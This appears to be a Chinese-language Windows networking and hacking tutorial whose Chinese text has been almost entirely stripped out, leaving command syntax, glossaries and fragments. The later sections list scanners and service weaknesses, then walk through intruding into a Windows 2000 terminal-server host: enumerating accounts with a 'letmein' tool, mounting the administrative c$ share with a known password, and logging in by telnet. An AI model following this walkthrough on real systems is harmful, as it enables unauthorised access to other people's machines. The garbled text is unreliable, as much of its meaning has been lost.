InetAddr IfaceAddr IP
EtherAddr
00-AA-00-4F-2A-9C
-s ARP
TCP/IP ARP
arp

""
(TCP/IP)

ARP
arp -a
IP 10.0.0.99 ARP
arp -a -N 10.0.0.99
IP 10.0.0.80 00-AA-00-4F-2A-9C ARP
arp -s 10.0.0.80 00-AA-00-4F-2A-9C
13.At
at

" "
at

at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}]


at

[[\\ComputerName]

hours:minutes

[{/every:date[,...]|/next:date[,...]}] command]

\\computername

[/interactive]

at
ID

/delete
ID

/yes
""
hours:minutes
24

00:00 [] 23:59 :

/interactive
command , command
/every:

command

date

MTWThFSSu 1 31
date at
/next:
command
command
Windows

.exe .com .bat


.cmd

(UNC)
/?

Schtasks at

schtasks at
schtasks "

"
at
at Administrators

Cmd.exe

At Cmd.exe
(.exe) Cmd.exe
cmd /c dir > c:\test.out

at
Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due
OK 2 Each M 12:00 AM chkstor > check.file
OK 3 Each F 11:59 PM backup2.bat

(ID)
(ID) at

Task ID1
Status:OK
Schedule:Each F
Time of Day:4:30 PM
Command:net send group leads status due at
at
"

"

at
(>)
at

(^) Output.text

at 14:45 c:\test.bat ^>c:\output.txt

systemroot

at
at at

" "

" "

UNC
at 1:00pm my_backup \\server\share
x: ?
at 1:00pm my_backup x:
at
at

Marketing
at \\marketing

Corp 3
at \\corp 3
8:00 Corp
Maintenance Corp.txt Reports
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports
>> \\maintenance\reports\corp.txt"
Marketing

Archive.cmd

at \\marketing 00:00 /every:5,10,15,20,25,30 archive


at
at /delete
(.exe)
cmd /c Cmd.exe
cmd /c dir > c:\test.out
14.Rsh
RSH Windows XP Windows 2000
RSH Windows 2000 Server Resource Kit Rshsvc.exe
RSH

rsh

rsh [Host] [-l UserName] [-n] [Command]

Host
command

-l UserName

-n
rsh NULL
Command

/?

rsh command

command
command Rsh


">
>"
"RemoteFile""LocalFile"
rsh othercomputer cat remotefile >> localfile

Remotefile otherremotefile
rsh othercomputer cat remotefile ">>" otherremotefile
rsh
Windows XP Professional

rsh

.rhosts
.rhosts UNIX

.rhosts
.rhosts
rcprexec rsh
.rhosts

(#)
host7 #This computer is in room 31A
.rhosts

.rhosts

(TCP/IP)

admin1

vax1 telcon
rsh vax1 -l admin1 telcon
15.Tftp
(TFTP) daemon
UNIX (TFTP) daemon
UNIX

tftp [-i] [Host] [{get | put}] [Source] [Destination]

-i

-i
ASCII (EOL)

Host

put
Destination Source
TFTP

get
Destination Source
Source

Destination
Destination Source

/?

get

FileTwo
FileOne put FileTwo
FileOne get
Windows XP Windows 2000 TFTP Windows
2000 TFTP Windows XP Windows 2000

(TCP/IP)

Users.txt vax1
Users19.txt
tftp vax1 put users.txt users19.txt
16.Nbtstat
TCP/IP (NetBT) NetBIOS

NetBIOS NetBIOS Nbtstat NetBIOS


Windows Internet (WINS) nbtstat

nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [s] [-S] [Interval]

-a remotename
NetBIOS RemoteName

NetBIOS NetBIOS
NetBIOS
-A IPAddress
NetBIOS IP

-c
NetBIOS NetBIOS
-n
NetBIOS Registered
WINS
-r
NetBIOS WINS Windows XP

WINS
-R
NetBIOS Lmhosts

#PRE
-RR
WINS NetBIOS
-s
NetBIOS IP
-S
NetBIOS IP
Interval
Interval
CTRL+C netstat

/?

Nbtstat
Nbtstat
Input
Output
In/Out

Lift
Local Name NetBIOS
Remote Host IP
<03> NetBIOS NetBIOS
16
<20>
ASCII
Type

Status NetBIOS ""

""
State NetBIOS
NetBIOS

IP


IP

TCP

(TCP/IP)

NetBIOS

CORP07

NetBIOS
nbtstat -a CORP07
IP 10.0.0.99

NetBIOS
nbtstat -A 10.0.0.99
NetBIOS
nbtstat -n
NetBIOS
nbtstat -c
NetBIOS Lmhosts

#PRE

nbtstat -R

WINS NetBIOS
nbtstat -RR

5 IP NetBIOS
nbtstat -S 5
17.Netstat
TCP IP IPv4

IPICMPTCP UDP IPv6

IPv6ICMPv6 IPv6 TCP


IPv6 UDP netstat TCP

netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]

-a
TCP TCP UDP

-e
-s

-n
TCP

-o
TCP

ID (PID) Windows

"

"

PID -a-n -p

-p Protocol
Protocol Protocol
tcpudptcpv6 udpv6 -s
Protocol tcpudpicmpiptcpv6udpv6icmpv6 ipv6
-s
TCP UDPICMP IP
Windows XP IPv6

IPv6

TCPIPv6 UDPICMPv6 IPv6

-p

-r
IP route print

Interval
Interval CTRL+C
netstat
/?

(-) (/)
Netstat
Proto
TCP UDP
Local Address
IP -n IP
*

Foreign Address
IP -n
IP *
(state)
TCP
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND

TIMED_WAIT
TCP RFC 793
(TCP/IP)

netstat -e -s

TCP UDP
netstat -s -p tcp udp

5 TCP

ID
nbtstat -o 5
TCP

ID
nbtstat -n -o
18.Runas

runas

[{/profile|/noprofile}]

[/env]

[/netonly]

[/smartcard]

[/showtrustlevels] [/trustlevel] /user:UserAccountName program

/profile
/profile

/no profile
/noprofile

/env

/netonly

/smartcard

/smartcard
/showtrustlevels
/trustlevel
/trustlevel
/showtrustlevels

/user:UserAccountName

user@domain domain\user

/user
/?

runas

runas "

"
runas Administrator Administrator
runas MMC
"

"
Administrator /user:

/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName

/user:AdministratorAccountName@DomainName
/user:DomainName\AdministratorAccountName
runas (*.exe) MMC (*.msc) MMC

"

""Users""Power Users"

runas MMC "

"
MMC "
".
runas

runas MMC "

"

"

" Windows 2000


runas
runas

RunAs RunAs
"

"

""""

Windows 2000

runas /user:localmachinename\administrator cmd

companydomain\domainadmin "

"
runas /user:companydomain\domainadmin "mmc
%windir%\system32\compmgmt.msc"

domain.microsoft.com user ""

runas /user:user@domain.microsoft.com "notepad my_file.txt"

MMC

runas /netonly /user:domain\username "command"


domain\username

19.Route
IP route

route

[-f]

[-p]

[Command

[Destination]

[mask

Netmask]

[Gateway] [metric Metric]] [if Interface]]

-f
255.255.255.255

127.0.0.0 255.255.255.0
224.0.0.0 240.0.0.0
addchange delete
-p
add TCP/IP
IP TCP/IP print

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes
Command

add
change
delete
print

Destination
IP
0 IP

0.0.0.0
mask subnetmask

IP 255.255.255.255

0.0.0.0 255.255.255.255

0 1
Gateway

IP IP

IP
metric Metric
1 ~ 9999

if Interface
route print

0x if

/?

TCP/IP LAN IP

LAN
TCP/IP

systemroot\System32\Drivers\Etc
Destination"" (DNS)
IP
Gateway DNS systemroot\System32\Drivers\Etc
NetBIOS
print delete Gateway
Destination (*) (*)

(?)
10.*.1, 192.168.* 127.* *224*

"Route:bad
gateway address netmask" 1
0

1 0
1
Windows NT 4.0Windows 2000Windows Millennium Edition
Windows XP route -p

Windows 95 Windows 98 route

(TCP/IP)

IP
route print
IP

10.
route print 10.*
192.168.12.1
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
10.41.0.0 255.255.0.0
10.27.0.1

route add 10.41.0.0 mask 255.255.0.0 10.27.0.1


10.41.0.0 255.255.0.0
10.27.0.1
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
10.41.0.0 255.255.0.0
10.27.0.1

7
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
10.41.0.0 255.255.0.0
10.27.0.1 0x3
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
10.41.0.0 255.255.0.0
route delete 10.41.0.0 mask 255.255.0.0
IP

10.
route delete 10.*
10.41.0.0 255.255.0.0
10.27.0.1 10.27.0.25
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
windowsserver cmd ip -> Windows 2k/2003
Server
ip
Windows2000

Unix ip

C:\>ipconfig (ipconfig ip )
Windows 2000 IP Configuration
Ethernet adapter :
Connection-specific DNS Suffix .:
IP Address............: 10.1.1.94 ip
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254

C:\>netsh
netsh>interface
interface>ip
interface ip>set address " " static 10.1.1.111 255.255.255.0 10.1.1.254
interface ip>exit
set :
set address - IP
set dns - DNS
set wins - WINS

IPCONFIG
C:\>ipconfig ipconfig

,
Windows 2000 IP Configuration
Ethernet adapter :
Connection-specific DNS Suffix .
IP Address............: 10.1.1.111
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254

..-
? -
aaaa - `aaaa'
abort -
add -
alias -
bye -
commit -
delete -
dhcp - `dhcp'

dump -
exec -
exit -
help -
interface - `interface'
offline -
online -
popd -
pushd -
quit -
ras - `ras'
routing - `routing'
set -
show -
unalias -
wins - `wins'
IP

IP Win2000 IP Win98

IP
IP
?
Win2000 netsh

""

"cmd" netsh
netsh

int ip

IP dump IP

C:\Documents and Settings\Administrator>netsh


netsh>
netsh>int ip
interface ip>dump

# ---------------------------------
# IP
# ---------------------------------
pushd interface ip
# IP
set address name = source = static addr = 192.168.0.5 mask = 255.255.255.0


set address name = gateway = 192.168.0.2 gwmetric = 1
set dns name = source = static addr = 61.237.17.181
add dns name = addr = 211.97.168.129
add dns name = addr = 211.98.4.1
set wins name = source = static addr = none
# 2 IP
set address name = 2 source = dhcp
set dns name = 2 source = dhcp
set wins name = 2 source = dhcp
popd
# IP
IP 2
netsh IP "set
address name = source=static
addr=IP mask="

netsh IP 192.168.0.7
255.255.255.0
C:\Documents and Settings\Administrator>netsh
netsh>int ip
interface ip>set address name = " " source = static addr = 192.168.0.7 mask = 255.255.255.0

interface ip>exit
ipconfig
C:\Documents and Settings\Administrator>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 2
Media State ........... Cable Disconnected
Ethernet adapter
Connection-specific DNS Suffix .
IP Address............ 192.168.0.7
Subnet Mask ........... 255.255.255.0
Default Gateway ......... 192.168.0.2
Win2000
IP IP

int ip
set address name= source=static addr=192.168.0.7 mask=255.255.255.0
"7.sh" C C
"netsh exec 7.sh" ? ipconfig

IP

"7.bat" "netsh exec


7.sh" IP
192.168.0.5192.168.0.7

IP
"addr" IP
172.19.96.7

IP

int ip
set address name = source = static addr = 172.19.96.7 mask = 255.255.255.0
set address name = gateway = 172.19.96.1 gwmetric = 1

ipconfig/all

IP ?
netstat
netstat TCP/IP netstat -a

netstat -r netstat -e

Ethernet

netstat -s netstat -n

Tracert IP
Tracert IP (TTL) ICMP

-d IP
-h maximum_hops target_name

-j host-list Tracert
-w timeout timeout
target_name IP
pathping

ping tracert

pathping

-n Hostnames
-h Maximum hops
-g Host-list
-p Period ping
-q Num_queries

-w Time-out
-T Layer 2 tag 2 IEEE 802.1p
2

-T
(QoS)

-R RSVP test Che "


(RSVP)" -R

(QoS)

DHCP

netsh
netsh>(Netshell) "dhcp"
dhcp> DHCP
server \\servername server ip_address

" servername

"

DHCP Netshell

/? help
DHCP list DHCP

Netshell

route
routing ip add/delete/set/show interface
IP
routing ip add/delete/set/show filter
IP
routing ip add/delete/show boundary

routing ip add/set ipiptunnel IP


IP
routing ip add/delete/set/show rtmroute

routing ip add/delete/set/show persistentroute

routing ip add/delete/set/show preferenceforprotocol

routing ip add/delete/set/show scope


routing ip set/show loglevel IP

routing ip show helper IP Netsh

routing ip show protocol IP


routing ip show mfe
routing ip show mfestats
routing ip show boundarystats IP
routing ip show rtmdestinations
routing ip show rtmroutes
routing ip nat set/show global (NAT)

routing ip nat add/delete/set/show interface


NAT
routing ip nat add/delete addressrange NAT

routing ip nat add/delete addressmapping NAT

routing ip nat add/delete portmapping NAT

routing ip autodhcp set/show global DHCP

routing ip autodhcp set/show interface


DHCP
routing ip autodhcp add/delete exclusion DHCP

routing ip dnsproxy set/show global DNS

routing ip dnsproxy set/show interface DNS

routing ip igmp set/show global IGMP


routing ip igmp add/delete/set/show interface
IGMP
routing ip igmp add/delete staticgroup

routing ip igmp show grouptable IGMP

routing ip igmp show ifstats IGMP

routing ip igmp show iftable IGMP

routing ip igmp show proxygrouptable IGMP

IGMP

routing ip igmp show rasgrouptable


Internet

routing ip ospf set/show global OSPF


routing ip ospf add/delete/set/show interface
OSPF
routing ip ospf add/delete/set/show area
OSPF
routing ip ospf add/delete/show range OSPF

routing ip ospf add/delete/set/show virtif


OSPF
routing ip ospf add/delete/show neighbor
OSPF
routing ip ospf add/delete/show protofilter
OSPF
routing ip ospf add/delete/show routefilter
OSPF
routing ip ospf show areastats OSPF

routing ip ospf show lsdb OSPF


routing ip ospf show virtifstats OSPF
routing ip relay set global "DHCP "
routing ip relay add/delete/set interface
"DHCP "
routing ip relay add/delete dhcpserver DHCP
DHCP IP
routing ip relay show ifbinding IP

routing ip relay show ifconfig "DHCP


"
routing ip relay show ifstats DHCP

routing ip rip set/show global IP RIP


routing ip rip add/delete/set/show interface
IP RIP
routing ip rip add/delete peerfilter RIP

routing ip rip add/delete acceptfilter


RIP
routing ip rip add/delete announcefilter
RIP
routing ip rip add/delete/show neighbor RIP
routing ip rip set/show flags IP RIP
routing ip rip show globalstats RIP

routing ip rip show ifbinding IP


routing ip rip show ifstats RIP

IPX netsh
routing ipx add/set staticroute IPX IPX
routing ipx add/set staticservice SAP SAP

routing ipx add/set filter IPX


routing ipx add/set interface IPX
IPX
routing ipx set global IPX
routing ipx rip add/set filter RIP
routing ipx rip set global IPX RIP
routing ipx rip set interface IPX RIP
routing ipx sap add/set filter SAP
routing ipx sap set global IPX SAP
routing ipx sap set interface IPX SAP

routing ipx netbios add nbname NETBIOS IPX


NetBIOS
routing ipx netbios set interface IPX
NetBIOS
WINS NetSh
list WINS

dump WINS
add name add name /?
add partner add partner /?
add pngserver Persona Non Grata
add pngserver /?
check database check
database /?
check name WINS
check name /?
check version check
version /?
delete name
delete name /?
delete partner
delete partner /?
delete records
delete records /?
delete owners delete
owners /?
delete pngserver Persona Non Grata
delete pngserver /?
init backup WINS init backup /?
init import Lmhosts init import /?
init pull "" WINS

init pull /?
init pullrange WINS
init pullrange /?
init push "" WINS
init push /?
init replicate init
replicate /?
init restore init restore /?
init scavenge WINS init
scavenge /?
init search WINS init search /?
reset statistics reset
statistics /?
set autopartnerconfig
set autopartnerconfig /?
set backuppath set
backuppath /?
set burstparam set
burstparam /?
set logparam set
logparam /?
set migrateflag set
migrateflag /?
set namerecord set
namerecord /?
set periodicdbchecking
set periodicdbchecking /?
set pullpartnerconfig ""
set pullpartnerconfig /?
set pushpartnerconfig ""

set pushpartnerconfig /?
set pullparam " " set
pullparam /?
set pushparam " " set
pushparam /?
set replicateflag set
replicateflag /?
set startversion ID set
startversion /?
show browser [1Bh]
show browser /?
show database
show database /?
show info show info /?
show name show
name /?
show partner """"

""
show partner /?
show partnerproperties show
partnerproperties /?
show pullpartnerconfig ""
show pullpartnerconfig /?
show pushpartnerconfig ""
show pushpartnerconfig /?
show reccount
show reccount /?
show recbyversion
show recbyversion /?
show server show server /?
show statistics WINS show

statistics /?
show version WINS
show version /?
show versionmap ID ""
show versionmap /?
Interface
interface set/show interface

interface set/show credentials

WAP





RFC1459 IRC

DCC

UNIXLinuxMacBSDWindows2000Windows95/98/MeWindows NT

Linux
Apache

Windows2000 Ftpd
ftp
IP


IP IP


IP
IP

IP IP
IP

IP

65535 65535

80

IRC

6667

1026


Perl


IP

DES

1
Internet: International Net
1969

Internet
(Email) (Telnet)

(Finger)(FTP)(Archive)
(Usenet)

(BBS)(News Group)(World Wide


Web WWW)

BBS Bulletin Board System Public Access


Message System,

WWW: World Wide Web


Internet

Remote Login: ()
Internet

HTTP: Hyper Text Transfer Protocol,


IPIP
FTP
Transfer Protocol Internet
FTP

FTP
Gopher: guf()
Internet
FTP() Telnet(IP )

Internet

Archive: a:kaiv , Internet


Internet FTP

WAIS
Wide Area Information Service
Internet
Listserv: Internet
IRCInternet Relay Chat,

Hypertext:

( )
Hyperlink:

HTML: Hyper Text Markup Language,

Tim Berners-Lee WWW()

WWW


HTML

(Home Page)

HTML
HTML WWW

Hypermedia:

Navigator: (Netscape) Internet Navigator


Internet
Navigator (WWW)(Email)(FTP)
(Telnet)(News Group)(Gopher)

IEInternet Explorer,Explorer
2

VF

VFPVisual FoxPro Visual


Fox
Pro Progress

Visual FoxPro Microsoft FoxPro

VCVisual C C

C BASIC
C

VBVisual Basic
BASIC Beginners All-purpose Symbolic Instruction Code(

) BASIC Quick BASIC, True BASIC

Microsoft Visual Basic

Delphidelfai
(Borland)

Java

/dav()
(Sun)Java

Internet

Java Write Once,Run anywhere(

)
PC UNIX

PDA()
SQLStructure Query Language

SQL

3
PCPersonal Computer

NC: Network Computer

MPC: Multimedia Personal Computer


MMX: MultiMedia eXtensions() CPU
MMX CPU (Video Signal)

(Audio Signal) (Graphical Manipulation) 57

MMX CPU ()

Intel Pentium 166MHz MMXTM: Intel Pentium (Intel)


CPU Registered()166MHz CPU

MHz Mega
Hertz MMXTM
TM Trade Mark
OOP: Object Oriented Programming,

28VGA: 28 ()

100
VGA Video
Graphics Array()
FATAllocation Table,

EPAEnvironmental Protection Agency EPA


1992 (Energy Star)


()
EPA EPA POLLUTION

PREVENTER
IC Intelligent Card,
ATX
IDE
DLLDynamic Link Library,
KBKilo ByteKB K=Kilo
B=Byte (
)
MBMega ByteMB M=Mega
GBGiga Byte,GB G=Giga
CAI: Computer-Assisted Instruction / Computer-Aided Instruction,

CAD: Computer-Aided Design
ISO International Standard Organization, ISO
1987 ISO 9000 1994
ISO 9000
1.ISO 9000-1:1994

2.ISO 9001:1994

3.ISO 9002:1994
3DS 3D Studio: Three Dimension Studio,
Autodesk
AutoCAD
VGA

VRVirtual Reality 3D

OCROptical Character Recognition( )


OCR
OCR TH
OCR NT for Windows
SCSISmall Computer System Interface,

OEMOriginal Equipment Manufacturer,


Microsoft OEM: OEM
Windows98Windows NTWorkStationWindows3.XMSDOS
MISManagement Information System,

MIS MISQuick MIS


PNPPlug and Play

Window98
PNP PC

(IRQ) (DMA)
Windows98 IRQ
DMA
OLEObject Linking and Embedding, OLE
OLE
()
(Component Object Model), COMOLE

MIDI Musical Instrument Digital Interface,


MIDI

MIDI

MIDI MIDI
(FM )
MPEG
Motion Picture Experts Group


MPEG MPEG

MPEG

MPEG

10

ADSL
ADSL: Asymmetric Digital Subscriber Loop

640Kbps

7Mbps

1.
2.
3.
4.
5. INTERNET
INTERNET

MODEM

INTERNET
ADSL

ASP
ASP Active Server Pages

VBscript Java Script


ASP

HTML
ASP CGI

Web
Internet

Web Web
Web Web

B2B

www.Alibaba.com

B2B

B2C

Internet

www.amazon.comwww.1hao.com

BBS
BBS

BBS Unix WWW BBS Unix
BBS Telnet BBS
BBS BBSbbs.gznet.com

CNNIC
CNNIC 1997 6 3

CNNIC

CNNIC
CNNIC CNNIC

CNNIC

CNNIC Internet Internet


CNNIC
(InterNIC)
(APNIC)
CEO
CEO Chief Executive Officer

CIO
CIO Chief Information Officer

CTO
CTO Chief Technology Officer

COO
COO Chief Operation Officer

CFO
CFO Chief Financial Officer

CGO
CGO Chief Government Officer


Plug-in

Web

DDN
DDNDigital Data NetworkDDN


A B
DDN

N*64k 2M

DDN
1"

"
POS
2"

"
3


EC E-Commerce
Internet

BtoB B2B
BtoC B2C CtoC
C2C CtoB C2B

www.Alibaba.comwww.8848.netwww.1hao.com

E-mail
E-mail
Email yourname@xxx.xxx

yourname@yahoo.com

@ at

Internet

E-mail Internet

Internet E-mail
www.163.net

FTP
FTP File Transfer Protocol Internet
Internet
Internet
FTP CutFTP

FTP

FAQ
FAQ Frequently Asked Questions
FAQ

Firewall

Homepage

Pages Web Internet Web

Homepage Pages
Homepages Pages
www.microsoft.comwww.ibm.com

Homepage

Pages Web Internet Web

Homepage Pages
Homepages Pages
Supercool.163.netcarboy.163.net
HTTP
HTTPHypertext Transfer Protocol WWW
WWW HTTP TCP/IP


Hacker

Internet
Internet 70
ARPA

Internet

LANMAN
WAN

Internet

Internet
ISP
ISPInternet Service Provider Internet
ISP InternetISP

ISP
ICP

ICP(Internet Content Provider) Internet ICP

ICP
ICQ
ICQ I seek you

ICQ www.icq.com
IP
IP Internet
IP 32
202.112.223.12

IP ABC IP
IP
ABC
0.0.0.0-127.255.255.255
128.0.0.0-191.255.255.255
192.0.0.0-223.255.255.255
IP
IP
NIC Internet
IP
IP
IP VoIPVoice over Internet protocol
Internet

VocalTec

163
163

163
Modem 163

www.163.com

163 www.163.net

ISOC
ISOCInternet Society

1992 (

)
(IAB)
(IETF) (IESG)
(IEPG) (IANA)

Intranet
Internet
Internet

Web Web
FTP Internet

wideband transmission

20


Browser

WWW
WWW

Microsoft Internet Explorer IE


Netscape Navigator Opera


Offline

WWW

MODEM
MODEM

Modem

Modem

Modem

POP3
POP3 Post Office Protocol version3 3
POP3
SMTP
SMTP Simple Mail Transfer Protocol

SMTP

WWW

WWW
www.yahoo.comwww.sohu.com

Upload

Download (Down)

SET
SET Secure Electronic Transaction VISA
MasterCard 1997 5 SET

SET

SET SSL

SSL
SSL Secure Socket Layer Netscape

SSL SSL

SQL
SQL sequel S-Q-L
MICROSOFT


WAP

WAP Wireless Application Protocol


TCP/IP WAP WAP
GSM
WAP WML

WAP

E-mail

Nokia7110Siemens3568iMotorola a6188

WWW
WWW World Wide Web
Web
WWW
News FTP
Telnet Gopher Mail
www.sina.com.cnwww.163.com

WWW

Web
ServerFTP ServerMail Server
Database Server

www.yahoo.comwww.163.net

TCP/IP IPX/SPX
NetBIOS TCP/IP

IPX/SPX. Internet TCP/IP



Internet
Internet
Internet

Internet

BBS Fido


Internet WWWFTPEmail

32
IP Internet
www.cctv.com Internet

.com .net
.edu .gov().mil .org

cnus

ukhksupercool.163.net

ISDN

ISDN Integrated Services Digital Network


ISDN

8 2

2 64Kbps
128Kbps


Internet Internet


Online


Payment Gateway Internet

Internet

Internet
11

[hacker]
(hacker) hack

()

50
6070

(password cracking)
(trapdoor)(backdoor)(Trojan horse)

"",.
.

"",.

() Trojan horse

[]

,,
!

, ,
, ,
,.
rootkit
Rootkit rootkit


wtmputmp lastlog rootkit
telnetshell finger

/var/log /var/adm

,
,.
IPC$
IPC$(Internet Process Connection) " "

IPC$ NT/2000 IP
NT/2000 ipc$
(c$,d$,e$ )

winnt
windows(admin$)

[],

Windows 2000/XP/2003
$
C$D$E$ Winnt Windows[admin$]
shell
shellshell
shell :

webshell

"web" - web ,"shell" -

webshell ( ) WEB

WEB
,

"".
,.
[]

http://www.xxx.com/soft.asp?id=123


domain d

1. WHOIS

2.

3.

webshell
4.
:Serv-u IIS
LOG
5. Admin )
6. ASP
[]
,,?
,

VIP

.,

, . ,

, VIP

,.

?
Computer Virus

?

clientserver

?
Firewall

?
Back Door

NIDS
NIDS Network Intrusion Detection System
Hacker Cracker

NIDS


Hub

SYN ?

TCP SYN

?
Worm1988 22
Robert Morris
UNIX Worm 6000

200 6000
CERT

99

Unix

Finger
Mail

DDoS
DDoS

ARP
ARP IP
MAC
ARP
ARP Mac

ARP

:
1. XXX XXX
2.
ARP

:HONEYPOT HONEYPOT
:IP ARP DNS Web

12

135137138139445
?

192.***.xx.x

IP 4

45
Standard: Solaris 2.x, Linux 2.1.???, Linux 2.2, MacOS
Telnet (23/tcp)
ssh (22/tcp)
ftp (21/tcp) (

)
netstat (15/tcp)
daytime (13/tcp)
systat (11/tcp)
echo (7/tcp)
time (37/tcp)
smtp (25/tcp)
www (80/tcp) (

)
finger (79/tcp)
auth (113/tcp)
sunrpc (111/tcp)
pop-2 (109/tcp)
linuxconf (98/tcp)
imap2 (143/tcp)
printer (515/tcp)
shell (514/tcp)
login (513/tcp)
exec (512/tcp)
unknown (693/tcp)
unknown (698/tcp)
unknown (727/tcp)
swat (910/tcp)
unknown (1025/tcp)

unknown (1039/tcp)
unknown (1038/tcp)
unknown (1037/tcp)
unknown (1035/tcp)
unknown (1034/tcp)
unknown (3001/tcp)
unknown (6000/tcp)
echo (7/udp)
general/tcp
daytime (13/udp)
unknown (728/udp) (

)
unknown (2049/udp)
unknown (681/udp)
unknown (2049/tcp)(

)
telnet (23/tcp)

(21/tcp)

/incoming
ftp
(21/tcp)
ftp TELNET
CWD ~XXXX CWD ROOT

(guest),

13/tcP(daytime)

udp
UDP

ECHO(7/tcp)

(25/tcp)smtp

EXPN VRFY
EXPN
VRFY

user@hostname1@victim

user@hostname1

WWW(80/TCP)

WWW
finger (79/tcp)

finger

auth (113/tcp)
ident
(

ROOT )
(98/tcp) LINUX
(513/tcp) RLOGIN
TELNET

exec (512/tcp)
rexecd ,
IP

135 FTP 135


2004


UNIX UNIX 0
WIN2000
WIN2K
230M


PING
5.0 GOOGLE N

NSS
NSS Perl

Sendmail
FTP
NFS

TFTP
Hosts.equiv
Xhost
NSS Hosts.equiv
NSS
AppleTalk
Novell
LAN


NSS

Ping

NSS
NSS NSS

$TmpDir_NSS
$YPX-ypx
$PING_ ping

$XWININFO_xwininfo
Perl include

Perl include
PATH
NSS ftplib.pl NSS
NSS
NSS

NSS

http://www.giga.or.at/pub/hacker/unix
Strobe TCP
strobe TCP strobe

strobe
strobe strobe
strobe

socket
strobe
strobe Solaris 2.3

getpeername()

-g
strobe
ISS strobe
/var/adm/messages
SATAN
SATAN UNIX C Perl
HTML UNIX

Linux SATAN
Linus tcp-scan

select()
fping
socket
Linux SATAN diff
ftp.lod.com
Sun sunsite.unc.edu diff
/pub/linux/system/network/admin/satan-linux.1.1.1.diff.gz
SATAN

FTPD

FTP
NFS

NIS

RSH

Sendmail
X

SATAN http://www.fish.com

SATAN SATAN

/satan-1.1.1 Perl
reconfig

PATH DNS
DNS /satan-1.1.1/conf/satan.cf
$dont_use_nslookuo=1
IRIX SunOS

SATAN
SATAN

100

SATAN
Jakal
Jakal

half scans
SYN/ACK

Courtney GAbriel
Half lifeJeff(PhiJi)Fay Abdullah Marahie
Jakal http://www.giga.or.at.pub/hacker/unix
IdentTCPscan
IdentTCPscan TCP

UID
.CONNECT
CONNECT bin/sh

TFTP

FSPScan
FSPScan

FSP

FSP FTP Internet

FSP *FSP
FTP FTP
E-mail FSP

Windows OS/2 GUI


XSCAN
XSCAN X

XSCAN

XSCAN

SSSShadow
Security Scanner
http://www.20cn.net/cgi-bin/download/down.cgi?list=scaner

SSS

NMAP

http://www.91one.net/dvbbs/dispbbs.asp?
boardid=17&id=1362&star=1#1362

PING

shellshell UNIX
xx
SHELL
http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1426
,
shell telnetshell
telnet
winshell

http://978229.myrice.com/tty/Preview.htm#MAILLISTDOC19

shell

Win2K

http://www.yesky.com/20010530/182273.shtml ;
Microsoft

SQL

Server

Webtasks

http://www.mhdn.net/se/2002-11-08/6386.html
Linux

kernel

ptrace

http://www.softhouse.com.cn/docs/southpark2169.html
IIS

http://moon-soft.com/e_commerce/soft/doc/readelite572760.htm

win2000
D
shell
Shell ?
UNIX
Shell(DOS command UNIX )Shell
dos
command.com
shell

http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=769
13

3389

3389

3389

(


scanner3.0 xscan scanner IP
scanner 3389
IP
3389 IP
IP TXT
xscan
SQL-Server NT-Server


IP TXT

3.0 mstsc

cmd.exenet use
net view\\
!


Windows Macintosh UNIX

*
Windows

Windows Windows 2000

Windows

Windows 2000
Windows 2000 Professional
Windows 2000
Windows 2000

MS-DOS Windows

Macintosh
UNIX
MS-DOSMacintosh UNIX

Windows 2000 Professional

Windows 2000 Server

Windows 2000 Server




Windows 2000 Server


Windows 2000 Server

Windows Windows CE (RDP)


Windows

(DFS) (DFS)
DFS DFS

Windows 2000 Server

Windows 2000

Server
Windows 2000 Server Active Directory

Windows 2000 Server

Windows 2000 Server Windows 2000 Server




Windows 2000 Server

40 128 128

TCP/IP

Windows 2000 Server

RDP-TCP

RDP RDP

RDP-TCP


/ Internet

Citrix CA
Citrix CA Citrix CA
Citrix CA TCP/IP

IPX/SPX
NetBIOS
3389
3389 . 3389

,M$

, :winnt4/win2000server/win2000ADVserver/win2000DS/XP .
winnt4

,2000 ,.
, win2000server server .(

).

..

: 192.168.0.1
: administrator
: 7788

2000

c:\winnt
,2000 ,

.
: c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users FORM server...
-------------------------
Total = 5
-------------------------
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet )
num3= IWAM_servername ( IIS )
num4= TsInternetUser (TsInternetUser)
-------------------------
Total = 5
--------------------------
num2/3/4 2000server

.
2000 .
:
:superscan3.exe

25,3372 2000server .
,
:cmdinfo.zip
2 NT/2K

,
,

,PACK ,

, ,

.
.
,:,
, .

3 ,

,
cmdinfo

2000 , 3389 .

? :?3389
, ,
3389

?
1.

termservice "

">>>""

.
2.

RDP "

">>>""

.
3.

3389 . 3389

4..
5.

.
6.....(

)
, 5 .

.,

C Z
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"

Z
,
Z:\Documents and Settings\All Users\\\

>
"

"""
,,(98% )
telnet .,
,

:
telnet , ., 2000
telnet ,

,.(~,!)
,.
.abu. WIN2K TELNET
,
(

,),

telnet .
23

,
telnet 192.168.0.1

/
*===============================================================
Microsoft Telnet
*===============================================================
C:\>
\\

!!!! ,

:
c:\>query user
. .
:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 .2002-1-12 22:5
\\,

.!,

.
--------------------------------------------------
C:\>dir c:\sysoc.inf /s // INF
c:\WINNT\inf 2000-01-10 20:00 3,770 sysoc.inf
1 3,770
----------------------------------------------------
